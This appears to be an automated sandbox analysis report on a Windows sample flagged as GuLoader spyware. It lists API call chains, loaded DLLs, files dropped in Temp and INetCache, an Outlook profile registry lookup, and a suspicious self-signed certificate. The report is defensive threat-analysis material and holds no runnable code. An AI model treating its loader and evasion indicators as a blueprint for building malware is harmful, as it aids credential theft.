Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FB670	5_2_394FB670
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F1817	5_2_394F1817
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F0012	5_2_394F0012
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FC610	5_2_394FC610
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F9410	5_2_394F9410
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FF810	5_2_394FF810
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F1828	5_2_394F1828
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FB030	5_2_394FB030
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FE230	5_2_394FE230
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FD8D0	5_2_394FD8D0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FA6D0	5_2_394FA6D0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F1CE0	5_2_394F1CE0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F04FA	5_2_394F04FA
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FF4F0	5_2_394FF4F0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F90F0	5_2_394F90F0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FC2F0	5_2_394FC2F0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F0E8A	5_2_394F0E8A
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F0E98	5_2_394F0E98
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FA090	5_2_394FA090
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FD290	5_2_394FD290
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FBCB0	5_2_394FBCB0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394F8AB0	5_2_394F8AB0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_394FEEB0	5_2_394FEEB0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39513998	5_2_39513998
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39511DF8	5_2_39511DF8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_395132B0	5_2_395132B0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_395116D8	5_2_395116D8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39512BC8	5_2_39512BC8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39514A8F	5_2_39514A8F
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39510FF0	5_2_39510FF0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_395124E0	5_2_395124E0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39513987	5_2_39513987
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39511DE8	5_2_39511DE8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_3951329F	5_2_3951329F
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_395116C8	5_2_395116C8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39512BB9	5_2_39512BB9
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39510C78	5_2_39510C78
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39510C6A	5_2_39510C6A
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39510FE2	5_2_39510FE2
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_395101DA	5_2_395101DA
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_395101E8	5_2_395101E8
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_395124D0	5_2_395124D0
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39BABA55	5_2_39BABA55
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39BA5C14	5_2_39BA5C14
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39BA6BB1	5_2_39BA6BB1
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39BA324C	5_2_39BA324C
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39BA5C09	5_2_39BA5C09
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_39BA1F40	5_2_39BA1F40

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Code function: String function: 00402BCE appears 48 times

Source: Nonmerchantable.exe

Static PE information: invalid certificate

Source: Nonmerchantable.exe, 00000005.00000002.4201291282.0000000035F27000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Nonmerchantable.exe
Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Nonmerchantable.exe

Source: Nonmerchantable.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/14@5/5

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		0_2_00403348
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,		5_2_00403348

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040460D

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\Desktop\Nonmerchantable.exe

File created: C:\Program Files (x86)\Hypotesers

Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging

Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Nonmerchantable.exe

File created: C:\Users\user\AppData\Local\Temp\nscAB8E.tmp

Jump to behavior

Source: Nonmerchantable.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Nonmerchantable.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Nonmerchantable.exe	ReversingLabs: Detection: 62%
Source: Nonmerchantable.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\Nonmerchantable.exe

File read: C:\Users\user\Desktop\Nonmerchantable.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Nonmerchantable.exe "C:\Users\user\Desktop\Nonmerchantable.exe"
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process created: C:\Users\user\Desktop\Nonmerchantable.exe "C:\Users\user\Desktop\Nonmerchantable.exe"
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process created: C:\Users\user\Desktop\Nonmerchantable.exe "C:\Users\user\Desktop\Nonmerchantable.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

File written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging\Tvejrs.ini

Jump to behavior

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Nonmerchantable.exe

Static file information: File size 1189128 > 1048576

Source: Nonmerchantable.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.3640382417.00000000051B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Nonmerchantable.exe

Code function: 0_2_6F951A98 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6F951A98

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 0_2_6F952F60 push eax; ret	0_2_6F952F8E
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585B539 push dword ptr [ebp+ebx-75h]; iretd	5_2_0585B53D
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_0585B4C7 push dword ptr [ebp+ecx-75h]; retf	5_2_0585B4D2
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Code function: 5_2_3925AE1D push dword ptr [ebp+eax-18h]; retf	5_2_3925AE21

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer and subject are identical) 2) Certificate validation failed with untrusted root certificate 3) Organization name 'Antikvitetsinteresserede' appears nonsensical and not a legitimate business 4) Email domain 'Holdership.Bor' is highly suspicious and not a valid TLD 5) Compilation date (July 2021) is significantly older than the certificate dates (June 2024-2025), suggesting certificate was likely generated to mask malicious code 6) While the country code is France (FR), which is not inherently suspicious, the organization name appears to be Danish/Norwegian which creates a geographical inconsistency 7) The OU field contains strange characters and spacing patterns typical of attempting to evade detection. These characteristics are commonly associated with malware attempting to appear legitimate through fake certificates.

Source: C:\Users\user\Desktop\Nonmerchantable.exe

File created: C:\Users\user\AppData\Local\Temp\nsmABCD.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nonmerchantable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
